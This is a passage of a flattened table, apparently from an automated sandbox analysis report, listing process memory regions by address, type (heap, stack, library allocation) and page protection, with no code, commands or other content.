trusted library allocation
|
page read and write
|
||
|
7F74000
|
heap
|
page read and write
|
||
|
B90000
|
heap
|
page read and write
|
||
|
1F92F4A0000
|
heap
|
page read and write
|
||
|
7DF4D0370000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F9176D1000
|
trusted library allocation
|
page read and write
|
||
|
1F91552E000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
15C8B8A0000
|
heap
|
page read and write
|
||
|
214FB1D7000
|
heap
|
page read and write
|
||
|
6DCC27C000
|
stack
|
page read and write
|
||
|
214FB3DA000
|
heap
|
page read and write
|
||
|
1FEBE2C0000
|
heap
|
page read and write
|
||
|
32A4000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FCF9F000
|
heap
|
page read and write
|
||
|
3AB1000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
|
1FEBE0EF000
|
heap
|
page read and write
|
||
|
1FEA6030000
|
trusted library allocation
|
page read and write
|
||
|
1FEA78F9000
|
trusted library allocation
|
page read and write
|
||
|
D5E3EFB000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3394000
|
heap
|
page read and write
|
||
|
1230000
|
heap
|
page read and write
|
||
|
B60000
|
unkown
|
page readonly
|
||
|
A99E5F9000
|
stack
|
page read and write
|
||
|
2DEC000
|
unkown
|
page read and write
|
||
|
1259000
|
heap
|
page read and write
|
||
|
7FFD34A04000
|
trusted library allocation
|
page read and write
|
||
|
130000
|
unkown
|
page readonly
|
||
|
F00000
|
unkown
|
page readonly
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3394000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD346F6000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
6DCC4FE000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD34660000
|
trusted library allocation
|
page read and write
|
||
|
1FEA730E000
|
trusted library allocation
|
page read and write
|
||
|
1FEA769E000
|
trusted library allocation
|
page read and write
|
||
|
2DBF000
|
heap
|
page read and write
|
||
|
1FEB7069000
|
trusted library allocation
|
page read and write
|
||
|
7FBE000
|
heap
|
page read and write
|
||
|
214FD131000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
A99E2FE000
|
stack
|
page read and write
|
||
|
35A9000
|
heap
|
page read and write
|
||
|
1FEBE0D7000
|
heap
|
page read and write
|
||
|
41F4000
|
unclassified section
|
page read and write
|
||
|
1210000
|
unkown
|
page read and write
|
||
|
1160000
|
unkown
|
page readonly
|
||
|
33E8000
|
heap
|
page read and write
|
||
|
B50000
|
unkown
|
page readonly
|
||
|
37E0000
|
direct allocation
|
page execute and read and write
|
||
|
D5E3BFE000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
FC0000
|
unkown
|
page readonly
|
||
|
1FEA7524000
|
trusted library allocation
|
page read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
D5E3CFE000
|
stack
|
page read and write
|
||
|
33CF000
|
heap
|
page read and write
|
||
|
15C8BC00000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1F91781A000
|
trusted library allocation
|
page read and write
|
||
|
1180000
|
unkown
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
345C000
|
heap
|
page read and write
|
||
|
1F9171F0000
|
heap
|
page execute and read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
B84000
|
heap
|
page read and write
|
||
|
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
|
BCA000
|
stack
|
page read and write
|
||
|
FC0000
|
unkown
|
page readonly
|
||
|
7FFD34643000
|
trusted library allocation
|
page execute and read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3090000
|
unkown
|
page execute and read and write
|
||
|
214FD18D000
|
heap
|
page read and write
|
||
|
7FFD34710000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F62000
|
heap
|
page read and write
|
||
|
15C8A0CF000
|
heap
|
page read and write
|
||
|
1FEA5BA0000
|
trusted library allocation
|
page read and write
|
||
|
30AF000
|
stack
|
page read and write
|
||
|
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
11B3000
|
heap
|
page read and write
|
||
|
1F927201000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FCFA8000
|
heap
|
page read and write
|
||
|
214FB1FD000
|
heap
|
page read and write
|
||
|
3C4C000
|
unclassified section
|
page read and write
|
||
|
549C000
|
system
|
page execute and read and write
|
||
|
7F51000
|
heap
|
page read and write
|
||
|
7FFD34642000
|
trusted library allocation
|
page read and write
|
||
|
1FEA4084000
|
heap
|
page read and write
|
||
|
145000
|
unkown
|
page read and write
|
||
|
3E0C000
|
unclassified section
|
page read and write
|
||
|
214FCFCE000
|
heap
|
page read and write
|
||
|
2FAC000
|
unkown
|
page read and write
|
||
|
1F915550000
|
trusted library allocation
|
page read and write
|
||
|
E00000
|
unkown
|
page readonly
|
||
|
3481000
|
heap
|
page read and write
|
||
|
37AD000
|
stack
|
page read and write
|
||
|
A99E37E000
|
stack
|
page read and write
|
||
|
2BD0000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1FEA5CCC000
|
trusted library allocation
|
page read and write
|
||
|
1F9155F5000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FD07A000
|
heap
|
page read and write
|
||
|
3552000
|
direct allocation
|
page execute and read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
|
1090000
|
heap
|
page read and write
|
||
|
D5E35FE000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
64D0000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
15C8BC12000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
32F0000
|
trusted library allocation
|
page read and write
|
||
|
1FEA3D80000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3421000
|
heap
|
page read and write
|
||
|
214FCFBF000
|
heap
|
page read and write
|
||
|
11B4000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
F30000
|
heap
|
page read and write
|
||
|
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
|
B84000
|
heap
|
page read and write
|
||
|
1FEB5F3A000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FB3D8000
|
heap
|
page read and write
|
||
|
15C8A0F2000
|
heap
|
page read and write
|
||
|
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
|
3389000
|
heap
|
page read and write
|
||
|
214FD130000
|
heap
|
page read and write
|
||
|
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
|
214FB14E000
|
heap
|
page read and write
|
||
|
B84000
|
heap
|
page read and write
|
||
|
1190000
|
heap
|
page read and write
|
||
|
B84000
|
heap
|
page read and write
|
||
|
859E000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1FEA3F1D000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3476000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
F10000
|
unkown
|
page readonly
|
||
|
214FB1FD000
|
heap
|
page read and write
|
||
|
214FCFC0000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3394000
|
heap
|
page read and write
|
||
|
33FB000
|
heap
|
page read and write
|
||
|
1F91773D000
|
trusted library allocation
|
page read and write
|
||
|
1FEA5E73000
|
trusted library allocation
|
page read and write
|
||
|
33FE000
|
heap
|
page read and write
|
||
|
125E000
|
heap
|
page read and write
|
||
|
1720000
|
unkown
|
page readonly
|
||
|
B84000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1FEA604B000
|
trusted library allocation
|
page read and write
|
||
|
E10000
|
unkown
|
page readonly
|
||
|
15C8B8C0000
|
trusted library allocation
|
page read and write
|
||
|
A99E27E000
|
stack
|
page read and write
|
||
|
2CE0000
|
heap
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1FEBE10C000
|
heap
|
page read and write
|
||
|
214FB1F6000
|
heap
|
page read and write
|
||
|
7FFD34653000
|
trusted library allocation
|
page execute and read and write
|
||
|
3416000
|
heap
|
page read and write
|
||
|
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
|
2B4E000
|
stack
|
page read and write
|
||
|
214FB140000
|
heap
|
page read and write
|
||
|
342B000
|
heap
|
page read and write
|
||
|
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
|
2B8E000
|
stack
|
page read and write
|
||
|
16C0000
|
unkown
|
page readonly
|
||
|
FF0000
|
heap
|
page read and write
|
||
|
147000
|
unkown
|
page readonly
|
||
|
338F000
|
heap
|
page read and write
|
||
|
6DCC7FE000
|
stack
|
page read and write
|
||
|
214FCFBF000
|
heap
|
page read and write
|
||
|
1F915290000
|
heap
|
page read and write
|
||
|
214FAFD0000
|
heap
|
page read and write
|
||
|
1FEBE094000
|
heap
|
page read and write
|
||
|
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
|
1F91731B000
|
trusted library allocation
|
page read and write
|
||
|
1051000
|
unkown
|
page readonly
|
||
|
A99E3FD000
|
stack
|
page read and write
|
||
|
1040000
|
unkown
|
page read and write
|
||
|
1FEBDDFB000
|
heap
|
page read and write
|
||
|
214FD0A9000
|
heap
|
page read and write
|
||
|
1FEB6448000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34736000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
|
1F917310000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3B22000
|
direct allocation
|
page execute and read and write
|
||
|
214FB3DE000
|
heap
|
page read and write
|
||
|
A99E47E000
|
stack
|
page read and write
|
||
|
214FCF6D000
|
heap
|
page read and write
|
||
|
1FEBDDB0000
|
heap
|
page read and write
|
||
|
15C8BDCE000
|
trusted library allocation
|
page read and write
|
||
|
B20000
|
direct allocation
|
page read and write
|
||
|
214FD030000
|
heap
|
page read and write
|
||
|
15C8B8C0000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1F917810000
|
trusted library allocation
|
page read and write
|
||
|
1FEA5C26000
|
heap
|
page execute and read and write
|
||
|
1F91754C000
|
trusted library allocation
|
page read and write
|
||
|
FE0000
|
unkown
|
page readonly
|
||
|
46AA000
|
unclassified section
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
F00000
|
unkown
|
page readonly
|
||
|
7FD1000
|
heap
|
page read and write
|
||
|
214FCFBF000
|
heap
|
page read and write
|
||
|
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
|
138F000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FB1CD000
|
heap
|
page read and write
|
||
|
F30000
|
heap
|
page read and write
|
||
|
3457000
|
heap
|
page read and write
|
||
|
B80000
|
heap
|
page read and write
|
||
|
1FEA3ED0000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
2BD0000
|
heap
|
page read and write
|
||
|
7FFD34822000
|
trusted library allocation
|
page read and write
|
||
|
3480000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1FEB5E2A000
|
trusted library allocation
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FB3DA000
|
heap
|
page read and write
|
||
|
D5E3DFE000
|
stack
|
page read and write
|
||
|
1F915530000
|
trusted library allocation
|
page read and write
|
||
|
1F915540000
|
heap
|
page readonly
|
||
|
339A000
|
heap
|
page read and write
|
||
|
7FC1000
|
heap
|
page read and write
|
||
|
130000
|
unkown
|
page readonly
|
||
|
34DD000
|
direct allocation
|
page execute and read and write
|
||
|
11A0000
|
unkown
|
page readonly
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FB1D9000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FC5000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
|
214FCFA2000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3A62000
|
unclassified section
|
page execute and read and write
|
||
|
7F50000
|
heap
|
page read and write
|
||
|
1F9155A0000
|
heap
|
page read and write
|
||
|
1FEBDC59000
|
heap
|
page read and write
|
||
|
1198000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3AAD000
|
direct allocation
|
page execute and read and write
|
||
|
7F40000
|
trusted library allocation
|
page read and write
|
||
|
1FEBDE5E000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
2DB5000
|
heap
|
page read and write
|
||
|
1F927270000
|
trusted library allocation
|
page read and write
|
||
|
D5E36FE000
|
stack
|
page read and write
|
||
|
214FB1C8000
|
heap
|
page read and write
|
||
|
7FFD347E2000
|
trusted library allocation
|
page read and write
|
||
|
1FEA7360000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
|
214FB1CA000
|
heap
|
page read and write
|
||
|
214FD086000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
81D0000
|
heap
|
page read and write
|
||
|
214FB1CF000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
6DCC2FE000
|
stack
|
page read and write
|
||
|
1F91543A000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
2CE4000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
A99E9BE000
|
stack
|
page read and write
|
||
|
1040000
|
unkown
|
page read and write
|
||
|
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1FEA6041000
|
trusted library allocation
|
page read and write
|
||
|
3405000
|
heap
|
page read and write
|
||
|
6DCBDA3000
|
stack
|
page read and write
|
||
|
1390000
|
unkown
|
page readonly
|
||
|
3481000
|
heap
|
page read and write
|
||
|
2FD4000
|
heap
|
page read and write
|
||
|
7FFD34800000
|
trusted library allocation
|
page execute and read and write
|
||
|
AD0000
|
direct allocation
|
page read and write
|
||
|
E10000
|
unkown
|
page readonly
|
||
|
3430000
|
heap
|
page read and write
|
||
|
6DCC47E000
|
stack
|
page read and write
|
||
|
214FB1C9000
|
heap
|
page read and write
|
||
|
2D92000
|
unkown
|
page read and write
|
||
|
E8A000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
E20000
|
unkown
|
page readonly
|
||
|
2EB1000
|
heap
|
page read and write
|
||
|
1F917201000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1FEA603F000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1F915475000
|
heap
|
page read and write
|
||
|
1198000
|
heap
|
page read and write
|
||
|
56861FE000
|
stack
|
page read and write
|
||
|
6DCC0FE000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FB1D6000
|
heap
|
page read and write
|
||
|
333D000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD34652000
|
trusted library allocation
|
page read and write
|
||
|
130000
|
unkown
|
page readonly
|
||
|
1238000
|
heap
|
page read and write
|
||
|
1FEBE0C3000
|
heap
|
page read and write
|
||
|
1F915521000
|
heap
|
page read and write
|
||
|
861E000
|
stack
|
page read and write
|
||
|
1390000
|
unkown
|
page readonly
|
||
|
3481000
|
heap
|
page read and write
|
||
|
11B0000
|
heap
|
page read and write
|
||
|
214FCF8B000
|
heap
|
page read and write
|
||
|
7FCE000
|
heap
|
page read and write
|
||
|
214FB1F6000
|
heap
|
page read and write
|
||
|
1FEA5B70000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
678E000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
F8C000
|
stack
|
page read and write
|
||
|
214FCBE0000
|
heap
|
page read and write
|
||
|
7FD4000
|
heap
|
page read and write
|
||
|
3740000
|
heap
|
page read and write
|
||
|
1FEBE092000
|
heap
|
page read and write
|
||
|
3767000
|
heap
|
page read and write
|
||
|
819C000
|
stack
|
page read and write
|
||
|
214FCF32000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
13E000
|
unkown
|
page readonly
|
||
|
1FEA3F90000
|
heap
|
page read and write
|
||
|
33FB000
|
heap
|
page read and write
|
||
|
A99E83E000
|
stack
|
page read and write
|
||
|
1FEBE030000
|
heap
|
page execute and read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
15C8BDBE000
|
trusted library allocation
|
page read and write
|
||
|
1F9155E7000
|
heap
|
page execute and read and write
|
||
|
2BE0000
|
unkown
|
page readonly
|
||
|
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
|
740000
|
direct allocation
|
page read and write
|
||
|
214FCF49000
|
heap
|
page read and write
|
||
|
582F000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FB1F6000
|
heap
|
page read and write
|
||
|
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
|
1F92F3F0000
|
heap
|
page read and write
|
||
|
1060000
|
unkown
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7F65000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1FEB6445000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
|
1FEA3F17000
|
heap
|
page read and write
|
||
|
1F91721B000
|
trusted library allocation
|
page read and write
|
||
|
214FB1D9000
|
heap
|
page read and write
|
||
|
7BE000
|
stack
|
page read and write
|
||
|
7FFD34644000
|
trusted library allocation
|
page read and write
|
||
|
1FEA4050000
|
trusted library allocation
|
page read and write
|
||
|
3730000
|
trusted library allocation
|
page read and write
|
||
|
214FD18E000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
|
214FCF56000
|
heap
|
page read and write
|
||
|
7FB8000
|
heap
|
page read and write
|
||
|
1FEA7830000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3394000
|
heap
|
page read and write
|
||
|
855D000
|
stack
|
page read and write
|
||
|
1F9171B0000
|
heap
|
page execute and read and write
|
||
|
15C89F0C000
|
system
|
page execute and read and write
|
||
|
1238000
|
heap
|
page read and write
|
||
|
1FEA4080000
|
heap
|
page read and write
|
||
|
3730000
|
trusted library allocation
|
page read and write
|
||
|
33DC000
|
heap
|
page read and write
|
||
|
1FEB6503000
|
trusted library allocation
|
page read and write
|
||
|
3194000
|
heap
|
page read and write
|
||
|
214FB1CB000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FCF60000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
147000
|
unkown
|
page readonly
|
||
|
214FB1FD000
|
heap
|
page read and write
|
||
|
214FB1CA000
|
heap
|
page read and write
|
||
|
1FEA7550000
|
trusted library allocation
|
page read and write
|
||
|
1070000
|
unkown
|
page read and write
|
||
|
1F92F7B0000
|
heap
|
page read and write
|
||
|
131000
|
unkown
|
page execute read
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
2CE0000
|
heap
|
page read and write
|
||
|
562C000
|
stack
|
page read and write
|
||
|
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
|
2FAC000
|
unkown
|
page read and write
|
||
|
1F917307000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1F915410000
|
trusted library allocation
|
page read and write
|
||
|
7F95000
|
heap
|
page read and write
|
||
|
7FFD347F4000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
B91000
|
heap
|
page read and write
|
||
|
147000
|
unkown
|
page readonly
|
||
|
145000
|
unkown
|
page read and write
|
||
|
11B4000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD34810000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FEA3E90000
|
heap
|
page read and write
|
||
|
7FFD34700000
|
trusted library allocation
|
page execute and read and write
|
||
|
214FCFB0000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1080000
|
heap
|
page read and write
|
||
|
145000
|
unkown
|
page read and write
|
||
|
B84000
|
heap
|
page read and write
|
||
|
214FB1FD000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FB1BC000
|
heap
|
page read and write
|
||
|
1330000
|
unkown
|
page readonly
|
||
|
3451000
|
heap
|
page read and write
|
||
|
2BE0000
|
unkown
|
page readonly
|
||
|
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
|
7FE1000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7F5B000
|
heap
|
page read and write
|
||
|
15C8BA60000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FB1C2000
|
heap
|
page read and write
|
||
|
15C8BC0C000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FCF51000
|
heap
|
page read and write
|
||
|
7FFD346FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1050000
|
unkown
|
page read and write
|
||
|
3BF2000
|
unclassified section
|
page read and write
|
||
|
145000
|
unkown
|
page read and write
|
||
|
214FCFC5000
|
heap
|
page read and write
|
||
|
1FEA3E60000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1F9153D0000
|
heap
|
page read and write
|
||
|
B20000
|
direct allocation
|
page read and write
|
||
|
15C8BC15000
|
trusted library allocation
|
page read and write
|
||
|
1F915444000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
15C8BC0E000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
A99F40E000
|
stack
|
page read and write
|
||
|
7FFD34654000
|
trusted library allocation
|
page read and write
|
||
|
1F92F36C000
|
heap
|
page read and write
|
||
|
338F000
|
heap
|
page read and write
|
||
|
1051000
|
unkown
|
page readonly
|
||
|
A99EA3C000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1F92F310000
|
heap
|
page read and write
|
||
|
1FEB5F49000
|
trusted library allocation
|
page read and write
|
||
|
214FCF46000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
2CD2000
|
unkown
|
page read and write
|
||
|
390D000
|
direct allocation
|
page execute and read and write
|
||
|
D5E38FF000
|
stack
|
page read and write
|
||
|
33FE000
|
heap
|
page read and write
|
||
|
54B8000
|
system
|
page execute and read and write
|
||
|
FD0000
|
unkown
|
page readonly
|
||
|
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
|
7FAF000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
1FEA606D000
|
trusted library allocation
|
page read and write
|
||
|
363A000
|
heap
|
page read and write
|
||
|
1FEA3FC0000
|
heap
|
page read and write
|
||
|
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
|
1F9155A6000
|
heap
|
page read and write
|
||
|
3B02000
|
unkown
|
page execute and read and write
|
||
|
15C89F09000
|
system
|
page execute and read and write
|
||
|
A11C000
|
system
|
page read and write
|
||
|
7FFD34770000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FEA4010000
|
trusted library allocation
|
page read and write
|
||
|
33AA000
|
heap
|
page read and write
|
||
|
104E000
|
stack
|
page read and write
|
||
|
7F68000
|
heap
|
page read and write
|
||
|
1FEA7313000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
|
1FEA735B000
|
trusted library allocation
|
page read and write
|
||
|
E00000
|
unkown
|
page readonly
|
||
|
1FEA3E98000
|
heap
|
page read and write
|
||
|
F10000
|
unkown
|
page readonly
|
||
|
3389000
|
heap
|
page read and write
|
||
|
214FCF97000
|
heap
|
page read and write
|
||
|
A99E7BD000
|
stack
|
page read and write
|
||
|
1090000
|
heap
|
page read and write
|
||
|
1096000
|
heap
|
page read and write
|
||
|
339A000
|
heap
|
page read and write
|
||
|
1F9154BE000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FCFBF000
|
heap
|
page read and write
|
||
|
214FB3DD000
|
heap
|
page read and write
|
||
|
3909000
|
direct allocation
|
page execute and read and write
|
||
|
3411000
|
heap
|
page read and write
|
||
|
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349D1000
|
trusted library allocation
|
page read and write
|
||
|
214FB0D0000
|
heap
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
1FEA5C40000
|
heap
|
page execute and read and write
|
||
|
214FCF65000
|
heap
|
page read and write
|
||
|
1FEA3F82000
|
heap
|
page read and write
|
||
|
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
11B0000
|
heap
|
page read and write
|
||
|
214FCF6A000
|
heap
|
page read and write
|
||
|
214FCF8E000
|
heap
|
page read and write
|
||
|
1FEA3FE6000
|
heap
|
page read and write
|
||
|
214FB3D0000
|
heap
|
page read and write
|
||
|
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
|
F20000
|
unkown
|
page readonly
|
||
|
1070000
|
unkown
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
343D000
|
heap
|
page read and write
|
||
|
2FAF000
|
stack
|
page read and write
|
||
|
214FB1BD000
|
heap
|
page read and write
|
||
|
7FFD34832000
|
trusted library allocation
|
page read and write
|
||
|
B84000
|
heap
|
page read and write
|
||
|
9E42000
|
system
|
page read and write
|
||
|
1F91724C000
|
trusted library allocation
|
page read and write
|
||
|
13E000
|
unkown
|
page readonly
|
||
|
3100000
|
heap
|
page read and write
|
||
|
3067000
|
heap
|
page read and write
|
||
|
1F92F3BC000
|
heap
|
page read and write
|
||
|
3205000
|
heap
|
page read and write
|
||
|
F8C000
|
stack
|
page read and write
|
||
|
214FB3D5000
|
heap
|
page read and write
|
||
|
1061000
|
unkown
|
page readonly
|
||
|
1F92F360000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FCFC1000
|
heap
|
page read and write
|
||
|
F20000
|
unkown
|
page readonly
|
||
|
1F91547D000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
35D0000
|
trusted library allocation
|
page read and write
|
||
|
3730000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
|
E8A000
|
stack
|
page read and write
|
||
|
1FEBE0BA000
|
heap
|
page read and write
|
||
|
1FEBE410000
|
trusted library section
|
page read and write
|
||
|
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
|
B84000
|
heap
|
page read and write
|
||
|
1FEBDDFD000
|
heap
|
page read and write
|
||
|
3405000
|
heap
|
page read and write
|
||
|
B60000
|
unkown
|
page readonly
|
||
|
1FEA7002000
|
trusted library allocation
|
page read and write
|
||
|
13E000
|
unkown
|
page readonly
|
||
|
1330000
|
unkown
|
page readonly
|
||
|
1F915390000
|
heap
|
page read and write
|
||
|
7FFD349D4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3470C000
|
trusted library allocation
|
page execute and read and write
|
||
|
3481000
|
heap
|
page read and write
